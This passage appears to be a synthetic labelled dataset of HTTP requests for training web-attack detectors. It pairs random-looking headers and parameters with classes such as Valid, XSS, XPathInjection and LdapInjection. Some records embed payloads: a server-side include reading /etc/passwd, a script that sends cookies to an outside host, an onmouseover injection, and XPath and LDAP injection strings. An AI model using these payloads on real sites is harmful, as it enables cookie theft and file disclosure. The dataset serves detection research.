Content-Type: application/x-www-form-urlencoded
Last-Modified: Mon, 16 Feb 09 01:09:59 GMT
Host: www.jtueBpipiR.it
Connection: close
Accept: video/mpeg, application/*;q=0.5, image/*;q=0.2
Accept-Charset: x-mac-chinesesimp, x-mac-japanese
Accept-Encoding: deflate, identity, gzip;q=0.9, deflate, identity;q=0.8
Accept-Language: ek-dTmecwts;q=0.0, te-l7yt;q=0.0, igstle-na, ec80p-yphhadr;q=0.7, c-NRtnvi;q=0.1
Cache-Control: min-fresh=29
Client-ip: 250.38.166.171
Cookie: guato=panewget
Cookie2: $Version="489"
Date: Wed, 22 Jul 09 01:03:10 CET
ETag: "fyoO2z0l@-7G5Y77R"
From: roTghx@6yttkye.com
If-Modified-Since: Mon, 08 Mar 04 10:52:53 UTC
If-Match: "t.2A5iZKkgxgNGwXc-"
If-None-Match: "f3nIfFK79d_bCTkPq"
Max-Forwards: 25
MIME-Version: 6.4
Pragma: no-cache
Referer: /wewplzs9/o0q1/9wti/ctoto3na/eaclhmol.jpg
TE: gzip,chunked
User-Agent: rnenoontni8eeobro
UA-Disp: 164,2432,32
Via: riLr/3.4 44.191.179.130
Transfer-Encoding: deflate
X-Serial-Number: 6974075
----: -------------------------------------

Ige=jec4ohytetho&5ryreeT=989865&pdet=Oew&roiefndfrnbHmy=856628845&CtsDhpje=<!--#include virtual="/etc/passwd"    -->&astlDeel=t2e@&zrirrncnl2ry=9378596&gHiUmaRVlnu=e&ipn0esT9aeE=eowaCr4&xupdateLX_9dP3An=:uwy nodet0ac&ehlo=566809&nwiAhrltwl=a2dicbwR4r&eesTteeepd=Asystemn&DTaLessyaere=sip]&sQH1YjczeautoexecDt=thdedunpyrgzPmfeq5

End - Id: 35928
Start - Id: 2209
class: Valid
GET /mkb@/vGr7IuMPowIuo/r7e9g3udreL3be49ebs/fQU/au@fkKV/3aJ5Q@/tLSf447Bz8L.zhu.yN/k1drxepP.html? HTTP/1.1
Host: www.tmtocae0f.ch
Connection: qahw
Accept: audio/x-wav
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: min-fresh=55545
Client-ip: 115.118.121.206
Cookie: igtep=rbzei e;tajh=94219;9pedt8nhbhgk=124;fgmaar8ain=lzu1vAov9my;ithiaj=53
Cookie2: $Version="0"
Date: Wed, 07 May 08 08:29:28 GMT
ETag: W/"NEm@awN1m2OzGEF"
Expect: msrta5n=iitiioje;eefdi=Kedcr8o
From: tb0ptsP4@sadr.be
If-Modified-Since: Thu, 27 Jan 05 15:31:11 GMT
If-Unmodified-Since: Tue, 21 Aug 07 07:37:14 CET
If-Match: "Ql1KLOYWCcTucLgV1hY"
If-None-Match: "2sWkLD4hgHkp8IX@U8"
If-Range: "goaU@j.ZD7YsUyek"
Max-Forwards: 3887
MIME-Version: 4.8
Pragma: ubrm67='5t'
Proxy-Authorization: Basic bmVGeGU6aThsZGc=
Authorization: ohotoo Oiao=8nqe3fe
Range: -9799,98225-
Referer: /ktsra/angitre3/eaenMree/eleTrbaE/eoOercWi.sh
TE: chunked,trailers
Trailer: If-Range
User-Agent: Mozilla/8.9 (Windows; U; WinNT 2.6; sn-qu; rv:7.4.4) Gecko/69691686
UA-CPU: Sparc
UA-Disp: 8951,7788,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 504x1598
Via: FTP/4.5 247.12.255.51, HTTP/2.3 80.139.78.107, 4.4 211.123.188.161
Transfer-Encoding: identity
Upgrade: yEnTa/2.2, edNa/0.7
Warning: 810 www.morweae.jpg "sa4qrwUneheea7hlfh" 
X-Forwarded-For: 2.94.110.211
X-Serial-Number: 92243859196
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 2209
Start - Id: 20920
class: Valid
GET /s7rt3iteh5ti5uoh/HsvRC/uLKWOY3OC/Re0u6eu/.@KoptGHKQfCoDSZ/4w1atld8t6/SorrEe.RToNpD/9_g3lAp6K-IIsyQMy/a-ln07HKTxh/hyvi/ySUoCg.nsf? HTTP/1.0
Host: 127.230.39.170
Connection: keep-alive
Accept: image/gif;q=0.9, application/rtf
Accept-Charset: windows-1253
Accept-Encoding: *;q=0.5
Accept-Language: sO8-n
Cache-Control: max-age=9239
Client-ip: 226.137.34.240
Cookie: irthuabmJyltsv8=6853;hnCetAatHr=yai/r;connectJHwdetcJ=76980;ararvb=tACu5k
Cookie2: $Version="56"
Date: Thu, 04 Sep 08 23:11:10 CET
ETag: "J4lLVZZuWv7_Cno-GkD"
Expect: 100-continue
From: nu4eam@Terdm.fr
If-Modified-Since: Fri, 08 Jul 05 21:15:51 UTC
If-Unmodified-Since: Tue, 20 Nov 07 17:16:01 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 13 Oct 06 15:35:07 UTC
Max-Forwards: 5
MIME-Version: 4.9
Pragma: cehnr='odainb'
Proxy-Authorization: 5lee isw1q=euaaW
Authorization: Basic ZWF0ZG9lblM6YW5wemVqbQ==
Range: 31-,-608039
Referer: http://swaiaaea.st/ip7oe/nzlu/r5dgbcee/busaemd/ueadnsto.cgi
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/0.8 (compatible; MSIE 5.1; Win98; re8csasudj; Etpet)
UA-CPU: 68000
UA-Disp: 743,400,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4129x627
Via: 0.4 244.104.38.234, eioej/6.1 219.22.142.145, HTTP/7.8 www.i1gyal.png
Transfer-Encoding: gzip
Upgrade: de7/0.8, frcre/7.5
Warning: 524 www.ihrn.jpeg "0rnvrpiinz" "Wed, 08 Apr 09 02:51:11 UTC"
X-Forwarded-For: 61.167.166.225
X-Serial-Number: 2430605
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20920
Start - Id: 12695
class: Valid
GET /dWp.exe?dJbgDdUwRYnE=3&ean5enee=ric0+&dwan=583&tentewislo4oh5=htpass%40oincluden%3EhSev-t%29ars&aVEt3=inaccess_log&8WitIetau=pNnfrzhnR1b%28%3Dabasnc-&q_c@=3530&UlyoaJLzqZ=anhpm8lvvj&moithh25ysn=+aeeebwgetfi0smG HTTP/1.0
Host: 60.73.96.202:80
Connection: close
Accept: */*
Accept-Charset: cp-936;q=0.5, windows-874;q=0.6, x-mac-arabic
Accept-Encoding: compress, compress;q=0.7, identity;q=0.6, compress;q=0.3
Accept-Language: *
Cache-Control: samiEged='whh'
Client-ip: 141.142.203.127
Cookie: r0kan=oehirmmgdMformW d;odadgcPOy=7toisdokzis;ef3ia=gs6vl1
Cookie2: $Version="994"
Date: Thu, 16 Aug 07 05:31:05 GMT
ETag: "nqAAltaC5qFMUOnweP-h"
Expect: 100-continue
From: aIsia@oetle.org
If-Modified-Since: Tue, 30 Aug 05 20:15:31 UTC
If-Unmodified-Since: Wed, 18 Mar 09 02:42:59 CET
If-Match: *
If-None-Match: "2g08--ljjUdBm9Y"
If-Range: *
Max-Forwards: 4
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM Z2huZTZwcmlldG84d2Vpc2VhZDNpZ25lZmhmZWVlbHRlZGxhOGFn
Authorization: ehbrxw s7ri=7cddeAtn
Range: 123920-
Referer: http://www.kfeEei.it/bogsuh/1ei3.tar
TE: deflate,gzip
Trailer: If-Match
User-Agent: Mozilla/0.4 (X11; U; Linux i586 5.4; 4v-fv; rv:2.0.2) Gecko/15561073
UA-CPU: Sparc
UA-Disp: 945,8372,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 072x109
Via: pad/3.3 61.87.216.217, 9.6 www.eEozirue.png:34018, FTP/7.7 www.sidso.png
Transfer-Encoding: gzip
Upgrade: sto2/5.6, i35ueo/6.1, obrejt/0.3, it5/7.0, igelon/5.7
Warning: 682 35.185.78.68 "bo8E" "Thu, 30 Oct 08 07:35:44 UTC"
X-Forwarded-For: 16.208.183.253
X-Serial-Number: 91220427481224
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12695
Start - Id: 47032
class: XSS
GET /eGTuejrW1MNPJi_/haat/hK.exe?ooakwp=dstnndtres&hoNDS=Lsier&ossetlnst9=irA%7E5i&taskvqeozEime=48atYnTuaoInt&7r0=mkn%3ADim&iyra3dudtnar=%3Cstyle+++++type+%3D++%22+++++text%2Fjavascript++++%22+%3E%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.ictrtege.com%2Fcgi-bin%2Fselaicst.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fstyle+%3E&Nlueuocatsnn=%3Amf+nph-eaetelnety&xuet=968630&t3Zs=s3dthleiw2emedcn&ctsh6=0661222&Mf50SBiframewT=idz HTTP/1.1
Host: www.PwthnAnkat.gov
Connection: keep-alive
Accept: application/*;q=0.3
Accept-Charset: *
Accept-Encoding: gzip, deflate
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 139.223.22.160
Cookie: uSdxdt=~c;n9na=fho1tdddi
Cookie2: $Version="184"
Date: Fri, 27 Aug 04 01:01:55 GMT
ETag: "m0dZZr9D1w57KZ3GH"
Expect: 100-continue
From: tGngiey@teedswatqu.fr
If-Modified-Since: Wed, 04 Aug 04 18:38:53 UTC
If-Unmodified-Since: Thu, 08 May 08 22:37:56 UTC
If-Match: "8e@KYxU.5mADLniHn1u"
If-None-Match: *
If-Range: Mon, 10 Sep 07 17:51:28 UTC
Max-Forwards: 6
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: u02e nsohtc=unmnd1b
Authorization: Basic aXdydTpTYm1scnp5ZQ==
Range: 127-39590,86298-2
Referer: http://siuef8yh.de/8nliEp/3lnPa9i/u4srr/H2mleess.tiff
TE: trailers,chunked,deflate;q=0.9
Trailer: If-Unmodified-Since
User-Agent: sssqyenftd
UA-CPU: MIPS
UA-Disp: 753,986,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7231x6416
Via: keey/6.0 140.59.75.235, 5.2 www.7ael.shtml:6726, 5.3 www.elaotip.js
Transfer-Encoding: compress
Upgrade: tlmcr/4.0, ihaNi/9.2, ezosme/6.2
Warning: 814 www.sz2gl.html "et0hhawps" "Sun, 03 Feb 08 08:33:56 UTC"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 40030380327368685
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47032
Start - Id: 48235
class: XSS
PUT /aYtmngeeatetbAha/coghaondys/y9aboinabmpAsnsietV/yj9resrxRsledukcns/ajuKwIcA/ubbB@@ku.png? HTTP/1.0
Content-Length: 164
Content-Language: Ynpt5
Content-Encoding: gzip
Content-Location: /oaRzef.mdb
Content-MD5: dGVhOGlkcm5vMW9iTzBpYg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 06 Feb 05 20:59:02 GMT
Last-Modified: Thu, 08 Apr 10 01:49:16 UTC
Host: 155.87.79.223:3727
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: iso-8859-2, iso-8859-5, koi8
Accept-Encoding: deflate;q=0.1, identity;q=0.1
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 112.4.101.116
Cookie: lnra=0768241;eorblLoa=<img    src=    " el    >"     onmouseover="   [alert ('al9');] " >
Cookie2: $Version="87"
Date: Wed, 04 Aug 04 19:44:35 CET
ETag: W/"O4eyEimQ9o3CUxc2YQhb"
Expect: 100-continue
From: oowkt3et@ea9hioiot.be
If-Modified-Since: Tue, 29 May 07 18:15:00 GMT
If-Unmodified-Since: Sat, 24 Feb 07 01:56:19 CET
If-Match: *
If-None-Match: "NuBgLqIdXdGqPWIQ"
If-Range: Mon, 17 Nov 08 04:48:38 UTC
Max-Forwards: 2039
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: o9ieam tglf6r=lilay
Authorization: Basic bGFuZXVlOmlhbWE=
Range: -594,-4310,59019-33
Referer: http://www.iofeamn.st/molgjvfi/hdwpCc/atggd/tn09.jsp
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: hh58 (mP0-8_S1b; t5tO2SK4)
UA-CPU: 68000
UA-Disp: 0382,578,16
UA-Color: color32
UA-Pixels: 582x431
Via: HTTP/0.9 www.ediilm.tiff, 2.4 222.124.101.250
Transfer-Encoding: deflate
Upgrade: eoa/9.6
Warning: 321 244.248.253.181 "iesqnoutyAsh" "Fri, 04 Feb 05 13:45:57 CET"
X-Serial-Number: 793433345048
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~

.-wGbEkhshutdown=sS&tsptasorcaosIt=erjhrcpeNc6i&ph=&&ahisao=>etc&rtaear4tdmvnya=?scriptrn9tandnlnb&8roRpYmefBen=$hp&Tqkemphiihlhuoh=it6(nkshxdOoieinsertoy

End - Id: 48235
Start - Id: 31670
class: Valid
GET /eCi0/tarfwcem8tyapaiotl/elz@q/jlD9znmGOo/fMceI/cLEsnq.nsf?rNq=teaeriis1ma&tasdfdoaredv8h=dMUJ&eneepsosssemnoe=813&wlu4ree=lhiosqoe1efho&itnm5mcnsf=2355584&tUpAhRao=aei&pqotn=887 HTTP/1.0
Host: 24.110.151.204
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.4
Accept-Language: tbp8o-eeliaao;q=0.6, z0irirpi-rrb;q=0.4, e-ad;q=0.2
Cache-Control: no-store
Client-ip: 250.102.202.34
Cookie: rsiThu=92;3eenn=6;ethagffkyx3=sRMhAs
Cookie2: $Version="223"
Date: Fri, 24 Aug 07 15:19:23 GMT
ETag: W/"yj3Ke_Th9ugnelKLp"
Expect: crmes
From: tnalwxn@id6aAl.gov
If-Modified-Since: Tue, 30 Mar 04 18:47:18 UTC
If-Unmodified-Since: Wed, 23 Sep 09 14:55:30 GMT
If-Match: "1RMIsydyY51HKe1pk"
If-None-Match: *
If-Range: "oTJJYr8NGKlknBlRo"
Max-Forwards: 402
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Basic b2R0ZWlkcTp6ZWloVXI=
Authorization: NTLM bXNFanJxZTFjZXplbmVlR2pld2lwZW1iUm5yRWUzbHQ=
Range: 9679-65969
Referer: http://www.nranm9u.org/esejud/yoUtr/Sewie.asmx
TE: trailers
Trailer: Date
User-Agent: Mozilla/3.7 (Machintosh; U; Mac OS X 3.8; rc-iR; rv:9.4.4) Gecko/31738780
UA-CPU: MIPS
UA-Disp: 4044,795,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7206x4658
Via: FTP/8.7 6.207.106.90:28786, hm84/6.3 www.3rge5.js, FTP/7.4 76.215.124.83:00
Transfer-Encoding: deflate
Upgrade: btunt/5.4, cYrmc9/5.3, hcAhe/8.8
Warning: 071 www.j3eiA.html "EeaengpaRo" "Wed, 16 Feb 05 06:28:35 UTC"
X-Forwarded-For: 13.228.134.190
X-Serial-Number: 049800080
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 31670
Start - Id: 10181
class: Valid
GET /plan6uoKtoatt/e.yYq8jhW/hqL_DcPFbVB7-Uub/clrs5aa5nrahtioTti/cMyeQD58C6/-ctdeXPgZ/jkbodyPunionyq/yqnF-ak4TbAe/iDPj_3Y8K5bJ7CUdpKwA/t8stOoozd8ptttrcabga/h@-GmdxSxAcSF3@KWY.shtml?b8dys=Nnjr&U6a3as=jeowtmryu&hWhB=0cP&hreaeson=w&iaa3mcano5u=tish6x1xB&includeunetcat7AOYGMSp=e0%3Ahtacces&uWttGi=3456034087 HTTP/1.0
Host: www.erwbwtin.uk
Connection: ineisi
Accept: */*;q=0.5
Accept-Charset: shift_jis;q=0.7, windows-1255;q=0.5, iso-8859-1, gb2312
Accept-Encoding: *
Accept-Language: lRhtaahr-i22lj;q=0.1, vnk5-sind1;q=0.6, sni-gNuf;q=0.3, Sot-0awn, dyn-toaHdg;q=0.9
Cache-Control: no-cache
Client-ip: 94.103.168.53
Cookie: seoxi7hhn=dZ-hbQLAJ8W;bipfinmtdfea=mtn$;iNwf5d=139
Cookie2: $Version="50"
Date: Sun, 26 Mar 06 10:56:25 UTC
ETag: "m9YNT.vHThE98mn8"
Expect: 100-continue
From: ED5c3ek@guAiepot1d.fr
If-Modified-Since: Fri, 01 May 09 10:41:26 GMT
If-Unmodified-Since: Sat, 16 Feb 08 15:51:03 UTC
If-Match: "JwOV-R1unHq8G.i"
If-None-Match: *
If-Range: Tue, 15 Jun 04 08:22:06 CET
Max-Forwards: 980
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest realm
Range: 0942-16,4-99538,69635-
Referer: http://www.ndWt.biz/aeres4/4eafwqNe/uudo/eiioc/i56ni.asmx
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: nsdtke2
UA-CPU: x86
UA-Disp: 7262,260,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 103x309
Via: FTP/4.1 67.152.179.165, 9.6 191.249.114.92, 0.1 www.airdotst.png
Transfer-Encoding: deflate
Upgrade: imhr/0.1, n6leen/2.1, iPhT/4.2
Warning: 842 www.ktzeHh.shtml "eDtsrAi" 
X-Forwarded-For: 68.175.44.54
X-Serial-Number: 62709231
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10181
Start - Id: 8202
class: Valid
GET /jfNSpJZ/4VxlQqUankDAyFr_r/HsHcvCehosE8fr1bite.htm?.SgaApGgNy=o+R+betweendeq+mox&NTZXc2s=pm0&ru6ce=21796094&biurebaafr=%3Aconnectdocument%3Ab&mtj=i%26ren%5Bad&gsat7wiIoioswb=sg4iframenph-kAycmd%7Cl&csmgqqwyeatom=een94sie%24N%3Etaih%3Cs&eot4aLA=abewesitcgiFw8u&trnsas0erleqfso=+%27aryc7wt%3B+&xC5arAtsh=bsstrle HTTP/1.1
Host: www.utrbkmdt.org
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: iso-8859-7, windows-1255;q=0.6, iso-2022-jp;q=0.1
Accept-Encoding: gzip;q=0.1, gzip;q=0.6, identity, identity;q=0.2, deflate
Accept-Language: *
Cache-Control: min-fresh=82
Client-ip: 87.9.157.161
Cookie: mtsemtqaxnseLem=$ (e;irc=3hci;FaUM-=4491645;hrnailme9=O ;re8uor5=rgYbRTHtFR
Cookie2: $Version="4"
Date: Tue, 07 Jun 05 05:57:02 CET
ETag: W/"DRJC8rHF-BS084oq4"
Expect: 100-continue
From: tnjiee0n@rlf3ge.de
If-Modified-Since: Tue, 12 Feb 08 17:09:28 GMT
If-Unmodified-Since: Sat, 10 Apr 10 02:37:27 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 20 May 08 03:00:59 GMT
Max-Forwards: 9
MIME-Version: 1.5
Pragma: Y=istrEfdo
Proxy-Authorization: Digest cnonce="rtmdnshp"
Authorization: Digest qop=auth
Range: -155,-198
Referer: http://www.urOt.fr/nshOhanm/nrtroos/8mizrtvz/8wpOol.wav
TE: chunked;q=0.2,gzip;q=0.6,chunked;q=0.4
Trailer: Accept-Charset
User-Agent: Mozilla/7.3 (Machintosh; U; Mac OS X 1.9; ns-ii; rv:7.4.0) Gecko/69980280
UA-CPU: x86
UA-Disp: 260,910,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1852x378
Via: FTP/8.4 www.utNx6.js:2, HTTP/3.0 184.100.234.43
Transfer-Encoding: gzip
Upgrade: 9o6e/7.7, eaTRi/7.4, yaoEli/5.7, rnj/7.6, pad/2.0
Warning: 689 128.202.115.69 "ilceonto6elpOdo9ca" "Thu, 24 Jun 04 13:57:23 UTC"
X-Forwarded-For: 216.1.28.119
X-Serial-Number: 8468350
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8202
Start - Id: 50007
class: XPathInjection
PUT /0o./Wnph-tM/HreplacemO5gRxp_xDcRZ/Umstyle/cw/cnddTrwthse3zlt/.-VLpositioncmd0A2i_SE/oMRNvgL7vRBtP/s1BDnwsy./cbYjj/a5W-aEWqajtzC.pl? HTTP/1.0
Content-Length: 329
Content-Language: 17oem6e,tesoq
Content-Encoding: gzip
Content-Location: http://www.l3des.org/Tats/e2iedE.jpg
Content-MD5: YTZyN2Vpc2RtMWVwaHJlcA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 08 Jan 05 10:50:29 GMT
Last-Modified: Tue, 02 Jan 07 20:52:04 UTC
Host: www.atdther.net
Connection: wcivj
Accept: application/rtf;q=0.8, audio/x-wav
Accept-Charset: *
Accept-Encoding: 
Accept-Language: er27h-yiua;q=0.2, pbe8aewi-ecaesDe;q=0.9
Cache-Control: only-if-cached
Client-ip: 119.180.39.9
Cookie: qHi=r2mkjaw;rkEde0csl9ceD=2i
Cookie2: $Version="26"
Date: Wed, 04 Aug 04 10:33:24 UTC
ETag: W/"_2XPRTZTzEEtnxCG"
Expect: 100-continue
From: oefc@rair.ch
If-Modified-Since: Tue, 09 May 06 18:22:17 UTC
If-Unmodified-Since: Thu, 23 Aug 07 04:06:21 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7727
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="Esaae"
Authorization: NTLM aFd5aGZoRGVEc2UzbTBlYWR0ZWxyZnFzenJNN2lockxCbTR0aWFpcmNhdXJoOA==
Range: 1-0902
Referer: http://www.SEsatuft.it/6lgT/eekyEgo.jpg
TE: trailers,gzip
Trailer: If-Match
User-Agent: 8     or   1<   j4e/dhr/h/child::text()[position()=809]  or 11471='] | /* | /foo[bar='
UA-CPU: x86
UA-Disp: 5539,6840,32
UA-OS: Solaris
UA-Pixels: 957x1532
Via: FTP/6.1 23.174.15.28, flswh/5.3 www.esAPea.jpg:6399
Transfer-Encoding: tarr
Upgrade: ihrzto/2.6, omrie/3.9, eairtL/8.4, nh9aUe/7.3, nbnau7/0.7
Warning: 530 www.qhehor.gif:76 "9eueIrtmcdq6tn" "Wed, 30 Jan 08 10:22:21 CET"
X-Serial-Number: 1430325
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~

B3nH40gNautoexecqTx=htpasswp-iyq?&DlferNnreisq= Hn&lhgsdnr=2389706&taMied9smsmj=rw&varHfromnHOMjP.drop=bJFc&jn=ams7HDd4yiA&nUspNep=d6N2&rnsetpm=baGDe1wg&unionNVqAcsopenmochaCJs=aighmLte&reaHewtuao=ax3eqNR5xJ4p&ci=1932051598&rrb=aLpf27&apWtwnfnIi=ee]allfupdatew6vtjpassthru&IolhtAaahsnm=eHuheocahtlu&sy3mrEukdaeae=eIisfhhlfabo

End - Id: 50007
Start - Id: 38346
class: LdapInjection
GET /tTOTtOQCeVaK.0HXb/ar.dlIfD6.7CtClg/ouurEab6htueteh/y4tsrnaAowe/saohieehhtntair/ktikkbaK/lechoTDxi/tou3tznm/nZXobjectt/oluebRMg/8nt2atteD.gif?Aq=eD8krhOwzI&6avFnrosiorem=aWlnAhtYN7t&SexecsR9=nRpm8yFPz&sOHt6iBmmt4ua=hsod8%29%28+++%7C+++%28cf%3D*%29&tlnawatl0xyOo=eY5RJ HTTP/1.0
Host: www.ahr1rwcd.com
Connection: aaee
Accept: video/quicktime, application/zip;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: irE-s5wtri, bttzn-remcpt;q=0.7, gH-igvihetT;q=0.3, il-cet;q=0.9, i-eba0ds
Cache-Control: no-cache
Client-ip: 126.43.137.208
Cookie: enrentgr=89;e0rt3ayh=9n;eoynnsheeuer=ned9qlArsl
Cookie2: $Version="4"
Date: Sun, 02 Apr 06 23:24:20 UTC
ETag: W/"cho582q.Rq4jRDNB"
Expect: 100-continue
From: vuerr@nGeav.fr
If-Modified-Since: Sat, 18 Dec 04 15:06:25 CET
If-Unmodified-Since: Sun, 16 May 04 20:47:04 CET
If-Match: *
If-None-Match: "JLvvXg31@D1chy3u_y"
If-Range: *
Max-Forwards: 08
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Basic bGlXaXJmYTpTcmFl
Authorization: NTLM b29laXdpcmVBY2xjZWFzb2VHZW9ha28xbGp1cmNpb3Nkbg==
Range: -0,575785-
Referer: http://wr0l.biz/nAdT6e/ildao/ea3hijh/lG7ie.avi
TE: trailers,deflate;q=0.6
Trailer: Pragma
User-Agent: e3JwOrji http://www.eiGetmh.st
UA-CPU: 68000
UA-Disp: 854,896,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 896x746
Via: 1.3 37.205.47.171, 0.4 www.hsbou.jpg:12818, vdnsie/3.7 www.gdnaisT.css:3167
Transfer-Encoding: gzip
Upgrade: Mso/2.1, 5stNn/1.9, etusna/2.9, fettee/0.9, 7agirn/3.3
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 9579642646846
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38346
Start - Id: 22932
class: Valid
GET /x3w@SOksV/allSnPbP8.MkDJ/oe7/ceH/ar6LT/est.bin?znuonitdwiTmk=aruhguhtttsncvmn&0urAbBzgloodn=+s&s.imgF=htei&iaogancaiteo=teboot.inin&ymdomHenrH=ae+ioi2ohAsp&rrunaeuJsA=ngrr7e&xrZfyDE-PYP=9037&0it=tejnO&oC=ujur&sfmeph4sam=hcosoaccept%7E&iwe78DwtvsC4=5&oRA46=Esiqge&ny0e7so=6889&tqOfk6t=dshe%3Cen&Al4=3430987 HTTP/1.1
Host: www.ogdnbn.uk
Connection: keep-alive
Accept: image/*, text/*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: ata5o-7ai6Pi4, op2oa9ne-7rt;q=0.0, r-mah, Olufb-un;q=0.4, ew-rtrmEs
Cache-Control: max-age=8
Client-ip: 214.209.92.15
Cookie: CnEtestexroehp=2992;izG-libHai=~ne)-;notnmjTht=/7@?la=/bniowhereD Nt;JNC3=350
Cookie2: $Version="24"
Date: Tue, 10 Nov 09 01:56:05 GMT
ETag: W/"7wTF12Qg9gzKIlgkm9"
Expect: 100-continue
From: sheeev0h@4urQEniSH.be
If-Modified-Since: Mon, 22 Jun 09 24:46:38 CET
If-Unmodified-Since: Sat, 01 Dec 07 06:22:31 CET
If-Match: "fYV@Js933u9Ccdn6dMFV"
If-None-Match: "a1ACJ-Fezj9aemYKV"
If-Range: Sun, 06 Jan 08 10:17:46 UTC
Max-Forwards: 7963
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: ieSnx2 uercttms=caa5oarX
Authorization: Basic djM4b3BzOnJOYUdr
Range: 3828-,508-92
Referer: /Euwi/aciskni/ddUwmst/ncnpo/dztrtUsi.pdf
TE: trailers,deflate;q=0.4
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.5 (Machintosh; U; PPC Mac OS X 4.4; rs-8s; rv:8.3.5) Gecko/25934807
UA-CPU: MIPS
UA-Disp: 3881,209,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 159x1338
Via: HTTP/7.3 www.atdGKPe6.jpg, 2.3 www.0ss0.css
Transfer-Encoding: identity
Upgrade: bey/2.9, ttdnH/6.2, Mue9/1.0, jecyw/5.5, 1dic/2.5
Warning: 116 www.qob7.png "kgn8bPjeeFe" 
X-Forwarded-For: 18.154.169.169
X-Serial-Number: 08954851223
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22932
Start - Id: 7928
class: Valid
PUT /AR/passthruz@YNN/lKHxYKFqrfC0u/tnt1hLWePWuBK3N1WAd/6na4aeiosD/D@childICSLMAi/CIoFD0/ag27dqr/vaitiOenrrqveY.gif? HTTP/1.0
Content-Length: 134
Content-Language: cseoot,betmd,cawhp
Content-Encoding: gzip
Content-Location: /ltAfreee/eTorx/eoeanq/nupr.sh
Content-MD5: YmVkbzNFY28wWW5mZW1tYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 23 Oct 09 11:35:03 UTC
Last-Modified: Tue, 07 Sep 04 20:17:33 GMT
Host: 32.153.179.52
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: shift_jis;q=0.9, iso-8859-6, x-mac-korean, x-mac-arabic;q=0.1, windows-1255;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 231.8.109.142
Cookie: en=@Gmesnph-sqabgo;hAeI=907;rR=tql;3rMbw=426246
Cookie2: $Version="1"
Date: Thu, 02 Dec 04 14:46:25 UTC
ETag: W/"CgWe2BEZciqADJecQP"
Expect: 100-continue
From: tnetvp@eecp.ch
If-Modified-Since: Thu, 28 Aug 08 20:54:12 GMT
If-Unmodified-Since: Sat, 10 Jul 04 03:15:18 CET
If-Match: ".PCGm9@M@mK57Q9Oe0Vs"
If-None-Match: "g15rewVnaFPSW1yh"
If-Range: Sat, 21 May 05 09:08:19 UTC
Max-Forwards: 560
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Digest username="sceiDcRc"
Authorization: Basic bGVrUzpjdkFUaHNi
Range: 671-64,-9902
Referer: /sid1ruph/nsnhaa.mpg
TE: trailers,deflate;q=0.9,trailers
Trailer: Date
User-Agent: fiswrata (aAxE6_HqO; phNAea; vAttHewQk; lRO4Hp8; pVGgWc)
UA-CPU: PowerPC
UA-Disp: 828,669,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3690x874
Via: HTTP/0.1 26.3.208.112
Transfer-Encoding: compress
